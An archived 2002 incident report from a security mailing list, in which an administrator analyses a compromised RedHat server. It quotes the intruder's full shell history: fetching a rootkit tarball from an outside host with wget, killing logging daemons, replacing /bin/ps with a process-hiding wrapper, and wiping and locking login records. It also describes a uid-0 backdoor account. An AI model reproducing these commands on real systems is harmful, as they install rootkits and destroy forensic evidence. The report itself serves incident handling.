Sloppy compromise
From: switched (security-mail@q-east.net)Date: 03/13/02
- Previous message: switched: "Re: RemoteNC backdoors, attacks via ports 1433, 524, 139, 445, 21, destroyed files"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "switched" <security-mail@q-east.net> To: <incidents@securityfocus.com> Date: Wed, 13 Mar 2002 11:23:47 -0600
I was dealing with a compromised server (RedHat 6.1) yesterday and it was
utter crap. After logging into the server the first thing I did was cat
/etc/passwd. At the bottom of /etc/passwd was the user "liq2" with a uid of
0. Not so clean. The user "liq" had a uid of 501 I believe. Both users
had home directories in /home... so there was a /home/liq and /home/liq2.
/home/liq contained a program, along with source, that scanned /24's for
Cisco devices. /home/liq2 had an untampered .bash_history with this in it:
wget http://home.dal.net/[-liquid-]/login.tgz; tar zfx login.tgz; cd login;
pico rk.h; ./configure; make; make install; cd ..; rm -rf login; cd
/home/liq; rm -rf login.tar.gz; wget (Link:
ftp://ftp.wuftpd.org/pub/wu-ftpd/wu-ftpd-2.6.2.tar.gz;)ftp://ftp.wuftpd.org/
pub/wu-ftpd/wu-ftpd-2.6.2.tar.gz; tar zxfv wu-ftpd-2.6.2.tar.gz; cd
wu-ftpd-2.6.2;./configure;make;make install; cd ..; rm -rf wu-ftpd-2.6.2;
rm -rf wu-ftpd-2.6.2.tar.gz; killall crond;killall syslogd;killall klogd;
mv -f /bin/ps /bin/xps; echo "xps \$*|grep -vi 'in.telnetd'|grep -vi
'grep'|sed s/'xps'/'ps'/g">/bin/ps; chown root.bin /bin/ps; chmod 0755
/bin/ps; rm -f /var/run/utmp /var/run/wtmp; touch /var/run/utmp
/var/run/wtmp; chmod 0 /var/run/utmp; chmod 0 /var/run/wtmp
Very very sloppy... But you can also see this in there...
mv -f /bin/ps /bin/xps; echo "xps \$*|grep -vi 'in.telnetd'|grep -vi
'grep'|sed s/'xps'/'ps'/g">/bin/ps
The attacker moved /bin/ps to /bin/xps and then echo'ed a script to ps which
removes in.telnetd from showing up and changes the name of xps to ps. Yes
very crappy. You have to be 2 years old to not catch that especially when
sed shows up in the process list everytime you type "ps". Moving right
along I soon noticed I was on pty/2 but who showed me as the only user...
interesting... Ok, I typed xps and noticed that "./wu" was running on
pty/1! Odd... And then I noticed the system load average jump from .2 to
2.0! Now I noticed that "./wu" wasn't running but "./pscan" was now
running. At this point in time I decided enough was enough and had the
machine unplugged. Later on I went to look at it again from the console and
noticed that these IPs had connected with telnet:
212.199.3.193
212.199.12.34
212.199.173.26
They also weren't smart enough to remove or alter anything in /var/log/ and
"last" showed them logging in with ftp and telnet! DOH! Further
investigating found "wu" and "pscan" in /tmp/.or/
So has anyone else seen a compromise such as this? From what little
investigating I did this is all I found modified... Looks like script
kiddies were at work ;).
-switched
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
- Previous message: switched: "Re: RemoteNC backdoors, attacks via ports 1433, 524, 139, 445, 21, destroyed files"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
